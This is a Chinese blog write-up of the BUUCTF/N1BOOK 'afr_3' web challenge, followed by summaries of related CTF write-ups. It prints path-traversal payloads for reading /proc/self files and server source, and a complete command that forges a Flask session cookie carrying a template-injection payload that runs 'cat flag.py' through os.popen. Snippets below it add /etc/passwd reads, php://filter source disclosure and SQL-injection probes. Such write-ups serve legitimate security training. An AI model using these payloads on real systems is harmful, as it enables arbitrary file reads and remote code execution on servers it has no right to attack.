BUUCTF afr_31

最新推荐文章于 2024-11-08 20:30:41 发布
最新推荐文章于 2024-11-08 20:30:41 发布
阅读量445 收藏 9
点赞数 5
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74167420/article/details/137783288
版权

(一)BUUCTF web afr_3 考察linux中/proc/目录的理解,以及flash模板注入

(1)name=../../../../../proc/self/cmdline
(2)name=../../../../../proc/self/cwd/server.py  (最后的py文件可以改变)

(二)BUUCTF afr_3 使用的是文件路径穿越漏洞,可以通过以上两行代码,查询到flag文件,
使用python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{ {''.class.mro[2].subclasses()[71].init.globals['os'].popen('cat flag.py').read()}}'}" 进行伪造。
这个命令看起来是在使用 Flask Session Cookie Manager 工具来对会话数据进行编码。具体来说,它执行了以下操作:

1、使用 flask_session_cookie_manager3.py 脚本。
2、使用 encode 子命令表示要对会话数据进行编码。
3、使用 -s 选项指定会话密钥,这里是 "Drmhze6EPcv0fN_81Bj-nA"

最低0.47元/天 解锁文章
《从0到1:CTFer成长之路》配套题目第一章afr_3
Youth____的博客
12-14 2453
afr_3 这题跟着wp做的,让人头秃 本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 /proc/[pid],当查看当前进程的时候可以用/pro
《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF
wuyaowangchuan的博客
11-19 2860
还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=/etc/passwd 读不到flag 找找WP /proc/sched_debug # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用 /proc/mounts # 挂载的文件系统列表 /proc/net/arp # arp表,可以获得内网其他机器的地址 /proc/net/route # 路由表信息 /proc/net/tcp and /proc/net/udp .
BUUCTF[第一章 web入门]afr_1
hivjianxian的博客
11-22 670
ctf题解
BUUCTF [第一章 web入门]afr_1
woshicainiao666的博客
08-21 476
题目告诉我们是任意文件读取,看到?p=hello 我们将hello换成flag,得到下图。我们想到利用php伪协议看源代码有没有隐藏信息。将源代码以base64的形式输出。然后解码得到flag。
BUUCTF:[01CTFER] afr_1,afr_2,afr_3(任意文件读写漏洞)
Asa_cc的博客
08-31 1111
CTF100天!(2/100)
[第一章 web入门]afr_3
最新发布
shierbai的博客
11-08 503
这样在后续才可以完成文件包含,这里伪造cookie是为了执行里面的代码,不是单纯的绕过认证,这里不加cookie会默认让cookie为n1code,至于后面那个/article接口只是在有flag字样时候展示notallow.txt,并不能完成攻击得到flag。flask_session_cookie_manager3伪造cookie。得知这里涉及ssit注入和flask模板注入,但是不理解怎么识别出来的。不同目录也是输flag会出现,猜测有黑名单。-t 指的是加密密文(ssti)-s 指的是加密密钥。
N1BOOK第四关摸鱼:[第一章 web入门]afr_1
weixin_45571987的博客
12-02 2840
BUUCTF:[第一章 web入门]afr_1寻找考点构造解题payload解码base64编码得到flag关于php伪协议 寻找考点   由题目我们可以得知本题考点是php伪协议(其实知道是文件读取漏洞也不知道会用到php://filter的伪协议来读取源码的文件 构造解题payload   php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 下面我们构造url,下面是通用格式http://127.0.0.1/cmd.php?file=ph
《从0到1:CTFer成长之路》--afr_1 BUUCTF
wuyaowangchuan的博客
11-17 4138
任意文件读取漏洞 发现了?p=hello,然后页面回显了hello world 因为提示了是文件读取漏洞 没有回显 因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀 php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flag PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 n1book{afr_1_solv.
CTF刷题记录Buuctf_N1BOOK——afr_3
m_de_g的博客
06-17 2003
** N1BOOK——afr_3 ** 一、解题思路 1.打开题目发现一个输入框 既然是web题的话,还是先查看页面源代码 就发现使用的是POST的提交方式,没办法,只能看这个框的秘密所在了 2.直接输入1进行查询 页面提示说,你为什么不看我们的文章呢?这里是个出发的按钮,点击 3.又有提示说明,这是一篇示例文章?内心充满了困惑?????? 抬头一看,URL好奇怪 http://80a3f61d-704d-4c38-b615-158bab104673.node3.buuoj.cn/article?
buuctf-afr_3
m0_66169375的博客
10-04 632
与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。3.发现目录穿越漏洞,结合题目确定是flask模板注入,爆破目录,访问../../../../../proc/self/cmdline。4.那么现在根据 /proc/ 的特性,可以读取正在运行的 pythonserver.py 的源码,访问server.py。
BUUCTF N1BOOK】[第一章 web入门] 通关
人若无名,便可专心练剑
02-05 2408
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
BUUCTF [第一章 web入门]afr_2 WP
m0_74788977的博客
01-24 430
查看网站源码,发现图片img的路径,由题目描述可知,这是一个任意文件读取漏洞。使用../返回到当前目录的上层目录。打开imf.gif所在的目录。
SSTI模板注入
weixin_42739903的博客
01-10 1620
SSTI 漏洞介绍和一些题目案例演示
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2797
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
N1Book-第一章Web入门-任意文件读取漏洞-afr_3
weixin_40872714的博客
04-03 1354
N1Book-第一章Web入门-任意文件读取漏洞-afr_3 参考文章: https://blog.youkuaiyun.com/AAAAAAAAAAAA66/article/details/121490787 http://elssm.top/2021/11/29/SSTI%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/ https://www.freebuf.com/articles/web/264088.html
BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2301
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
《从0到1:CTFer成长之路》--afr_2 BUUCTF
wuyaowangchuan的博客
11-18 2458
依旧是任意文件读取漏洞 进入环境 查看页面源代码 访问一下这个目录 看到…/就想到目录穿越 n1book{afr_2_solved}
N1BOOK第五关摸鱼:[第一章 web入门]afr_2
weixin_45571987的博客
12-02 2126
BUUCTF:[[第一章 web入门]afr_2打开页面,寻找解题线索查看目录并进行目录穿越查看img目录进行目录穿越拿到flag原理Nginx错误配置产生穿越漏洞 打开页面,寻找解题线索   页面里只有一个hello和一个gif图片,习惯性地打开源代码看看。   发现这边的gif图片在img文件夹中 查看目录并进行目录穿越 查看img目录   在url后面输入/img,成功查看img目录 进行目录穿越   在原来的url后面加上img../   然后我们就进入到了根目录下,在最下方有一个名为flag的
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过将人脸图像输入到虹软人脸识别SDK中,可以得到一个AFR_FSDK_FACEMODEL结构体,该结构体中存储了该人脸的特征数据。在进行人脸比对时,只需要将两个人脸的特征数据进行比对即可。\n\
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值